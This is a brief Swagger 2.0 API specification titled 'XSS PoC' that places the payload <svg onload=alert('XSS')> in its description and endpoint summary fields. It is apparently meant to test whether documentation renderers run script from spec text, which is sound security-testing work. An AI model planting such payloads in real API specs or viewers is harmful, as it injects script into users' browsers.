swagger: "2.0"
info:
  title: "XSS PoC"
  description: "<svg onload=alert('XSS')>"
  version: "1.0.0"
paths:
  /test:
    get:
      summary: "Test <svg onload=alert('XSS')>"
      responses:
        '200':
          description: "Success"
